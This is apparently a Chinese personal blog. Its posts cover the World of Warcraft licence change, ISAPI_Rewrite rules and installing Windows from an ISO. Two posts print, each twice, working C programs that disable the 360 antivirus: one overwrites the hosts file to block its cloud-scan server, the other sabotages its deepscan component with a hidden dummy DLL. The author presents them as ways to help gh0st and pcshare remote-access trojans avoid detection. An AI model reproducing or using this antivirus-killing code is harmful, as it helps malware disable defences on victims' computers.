6月8
上上个月知道魔兽世界代理权要易主了,网易获得了魔兽世界中国大陆地区的代理权.
九城代理期间存在着许许多多的问题,最不能容忍的是服务器太烂,不知道将来网易会不会做的好一点。
4月16日消息,美国暴雪娱乐公司和网易公司(NASDAQ:NTES)今天宣布,在中国大陆地区《魔兽世界》现有运营权协议到期后,将其独家运营权授予网易旗下关联公司,为期三年。
九城代理期间存在着许许多多的问题,最不能容忍的是服务器太烂,不知道将来网易会不会做的好一点。
5月29
不多说,上代码。
//By:洪流
#pragma comment(linker, "/OPT:NOWIN98")
#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/subsystem:windows")
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"MSVCRT.lib")
#pragma comment(linker,"/ENTRY:Torrent /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text CTION:.text,EWR /IGNORE:4078")
int AntiYunScan()
{
char host[MAX_PATH];
GetSystemDirectory(host,MAX_PATH); //得到host目录,免疫杀毒软件
strcat(host,"\\drivers\\etc\\hosts");
SetFileAttributes(host,FILE_ATTRIBUTE_NORMAL);
FILE *file;
file=fopen(host,"w");//以写入的方式打开文件,"w"--write
char mianyi[MAX_PATH]=
"127.0.0.1 localhost\r\n"
"127.0.0.1 qup.f.360.cn\r\n";
fputs(mianyi,file);
fclose(file);//关闭文件
return 0;
}
void Torrent()
{
AntiYunScan();
ExitProcess(0);
}
//By:洪流
#pragma comment(linker, "/OPT:NOWIN98")
#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/subsystem:windows")
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"MSVCRT.lib")
#pragma comment(linker,"/ENTRY:Torrent /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text CTION:.text,EWR /IGNORE:4078")
int AntiYunScan()
{
char host[MAX_PATH];
GetSystemDirectory(host,MAX_PATH); //得到host目录,免疫杀毒软件
strcat(host,"\\drivers\\etc\\hosts");
SetFileAttributes(host,FILE_ATTRIBUTE_NORMAL);
FILE *file;
file=fopen(host,"w");//以写入的方式打开文件,"w"--write
char mianyi[MAX_PATH]=
"127.0.0.1 localhost\r\n"
"127.0.0.1 qup.f.360.cn\r\n";
fputs(mianyi,file);
fclose(file);//关闭文件
return 0;
}
void Torrent()
{
AntiYunScan();
ExitProcess(0);
}
5月24
最近几天潜心学习C++,玩玩gh0st,pcshare源码免杀。360比较垃圾但也难缠,今天我们就把它的云查杀废了,直接上洪流的代码。
// By:洪流
#pragma comment(linker, "/OPT:NOWIN98")
#pragma comment(linker, "/merge:.data=.text")
#pragma comment(linker, "/merge:.rdata=.text")
#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/subsystem:windows")
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"MSVCRT.lib")
#pragma comment(linker,"/ENTRY:Torrent /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text CTION:.text,EWR /IGNORE:4078")
void Torrent()
{
HKEY hKey = NULL;
DWORD len=MAX_PATH;
DWORD type=REG_SZ;
char pBuf[200];
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360Safe.exe",0,KEY_ALL_ACCESS,&hKey);
if (RegQueryValueEx(hKey, "Path" , NULL, &type, (unsigned char*)pBuf, &len) == ERROR_SUCCESS)
{
char TempPath[200];
char exe[200];
char dll[200];
char exe_1[200];
char dll_1[200];
GetTempPath(sizeof(TempPath),TempPath);
wsprintf(TempPath,"%s\\tmp",TempPath);
wsprintf(pBuf,"%s\\deepscan",pBuf);
MoveFile(pBuf,TempPath);
CreateDirectory(pBuf,NULL);
wsprintf(exe,"%s\\360deepscan.exe",TempPath);
wsprintf(dll,"%s\\360wservice.dll",TempPath);
wsprintf(exe_1,"%s\\360deepscan.exe",pBuf);
wsprintf(dll_1,"%s\\360wservice.dll",pBuf);
CopyFile(exe,exe_1,FALSE);
CopyFile(dll,dll_1,FALSE);
FILE *file;
strcat(pBuf,"\\deepscan.dll");
file=fopen(pBuf,"w");
char fuck[10];
wsprintf(fuck,"deepscan");
fputs(fuck,file);
fclose(file);
SetFileAttributes(pBuf, FILE_ATTRIBUTE_HIDDEN);
}
RegCloseKey(hKey);
}
// By:洪流
#pragma comment(linker, "/OPT:NOWIN98")
#pragma comment(linker, "/merge:.data=.text")
#pragma comment(linker, "/merge:.rdata=.text")
#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/subsystem:windows")
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"MSVCRT.lib")
#pragma comment(linker,"/ENTRY:Torrent /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text CTION:.text,EWR /IGNORE:4078")
void Torrent()
{
HKEY hKey = NULL;
DWORD len=MAX_PATH;
DWORD type=REG_SZ;
char pBuf[200];
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360Safe.exe",0,KEY_ALL_ACCESS,&hKey);
if (RegQueryValueEx(hKey, "Path" , NULL, &type, (unsigned char*)pBuf, &len) == ERROR_SUCCESS)
{
char TempPath[200];
char exe[200];
char dll[200];
char exe_1[200];
char dll_1[200];
GetTempPath(sizeof(TempPath),TempPath);
wsprintf(TempPath,"%s\\tmp",TempPath);
wsprintf(pBuf,"%s\\deepscan",pBuf);
MoveFile(pBuf,TempPath);
CreateDirectory(pBuf,NULL);
wsprintf(exe,"%s\\360deepscan.exe",TempPath);
wsprintf(dll,"%s\\360wservice.dll",TempPath);
wsprintf(exe_1,"%s\\360deepscan.exe",pBuf);
wsprintf(dll_1,"%s\\360wservice.dll",pBuf);
CopyFile(exe,exe_1,FALSE);
CopyFile(dll,dll_1,FALSE);
FILE *file;
strcat(pBuf,"\\deepscan.dll");
file=fopen(pBuf,"w");
char fuck[10];
wsprintf(fuck,"deepscan");
fputs(fuck,file);
fclose(file);
SetFileAttributes(pBuf, FILE_ATTRIBUTE_HIDDEN);
}
RegCloseKey(hKey);
}
5月13
[ISAPI_Rewrite]
CacheClockRate 3600
RepeatLimit 32
##注释
#
RewriteCond Host: (.*)
RewriteRule ([^.?]+[^.?/]) http://$1$2/ [I,R]
#站点一,对ukidweb.s118.288idc.com的访问都会被重写到站点根目录下的ukidweb目录
RewriteCond Host: (?:www.)?ukidweb.s118.288idc.com
RewriteRule (.*) /ukidweb$1 [I,L]
#不带参数的重写,访问index.htm 就等于访问 index.php
RewriteRule /index.htm /index.php
#带参数的重写用正则表达式
RewriteRule ^(.*)/article/([^/]*)\.htm/?([0-9]+)?/?([0-9]+)?/?$ $1/read\.php\?blogalias=$2&page=$3&part=$4 [I]
本站代理的空间均支持ISAP_Rewrite组件,一个空间可以虚拟出许多个空间的哦
5月8
很多同学有光驱但是没刻录机,在网上下载的操作系统就不能刻录安装。但是我们不能就这样就屈服,今天我们就来解决它!
光驱安装系统其实也就是在系统启动时引导到光盘而非硬盘,今天我们就用软件来模拟。
下载文件 (已下载 29 次)
我是在装Windows 7的时候发现这个好工具的,它支持安装WINODWS VISTA/7/2008 其他的大家可以测试下。使用时将ISO文件解压到非系统盘根目录下,运行这个程序安装,然后重起,引导的时候就会多出一个选项,就这么简单,还不去试一试!
光驱安装系统其实也就是在系统启动时引导到光盘而非硬盘,今天我们就用软件来模拟。
下载文件 (已下载 29 次)我是在装Windows 7的时候发现这个好工具的,它支持安装WINODWS VISTA/7/2008 其他的大家可以测试下。使用时将ISO文件解压到非系统盘根目录下,运行这个程序安装,然后重起,引导的时候就会多出一个选项,就这么简单,还不去试一试!




14:16


